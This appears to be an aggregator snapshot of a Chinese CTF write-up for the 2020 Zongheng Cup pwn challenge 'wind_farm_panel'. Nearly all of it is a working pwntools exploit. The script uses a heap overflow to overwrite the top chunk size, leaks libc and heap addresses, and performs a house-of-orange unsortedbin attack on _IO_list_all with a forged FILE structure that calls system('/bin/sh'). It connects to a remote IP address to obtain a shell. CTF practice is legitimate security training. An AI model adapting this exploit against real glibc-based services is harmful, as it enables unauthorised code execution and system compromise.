6
纵横杯 2020 Pwn wind_farm_panel
source link: https://xuanxuanblingbling.github.io/ctf/pwn/2020/12/28/orange/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
纵横杯 2020 Pwn wind_farm_panel
发表于 2020-12-28
| 分类于 CTF/Pwn
house_of_orange原题
from pwn import *
context(arch='amd64',os='linux',log_level='debug')
myelf = ELF("./pwn")
libc = ELF("./libc-2.23.so")
#io = process(myelf.path,env={"LD_PRELOAD" : libc.path})
io = remote("182.92.203.154",28452)
uu64 = lambda data : u64(data.ljust(8, b'\0'))
sla = lambda delim,data : (io.sendlineafter(delim, data))
sa = lambda delim,data : (io.sendafter(delim, data))
add = lambda index,size,data : (sla(">> ","1"),sla("on(0 ~ 5):",str(index)),sla("turbine: ",str(size)),sa("name: ",data))
show = lambda index : (sla(">> ","2"),sla("viewed: ",str(index)))
edit = lambda index,data : (sla(">> ","3"),sla("turbine: ",str(index)),sa("input: ",data))
#gdb.attach(io,"")
add(0,130,"a"*136+p64(0xf71))
add(1,0x1000,"xuan")
add(2,0x200,"xuan")
# leak libc
edit(0,"a"*144+"b"*8)
show(0);io.recvuntil("b"*8)
libc_addr = uu64(io.recv(6))-0x3c5188
log.success(hex(libc_addr))
edit(0,"a"*136+p64(0xf71))
libc.address = libc_addr
# leak heap
edit(0,"a"*152+"b"*8)
show(0);io.recvuntil("b"*8)
heap_addr = uu64(io.recv(6))
log.success(hex(heap_addr))
edit(0,"a"*136+p64(0xf71))
# unsortedbin attack
data = "a"*(0x290)
payload = "/bin/sh\x00" + p64(0x61)
payload += p64(0) + p64(libc.symbols['_IO_list_all']-0x10)
payload += p64(0) + p64(1)
payload = payload.ljust(0xd8, "\x00")
payload += p64(heap_addr + 0x210 + 0xd8 + 0x8)+p64(libc.symbols['system'])*8
edit(0,data+payload)
# tigger
sla(">> ","1")
sla("on(0 ~ 5):",str(4))
sla("turbine: ",str(200))
io.interactive()
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK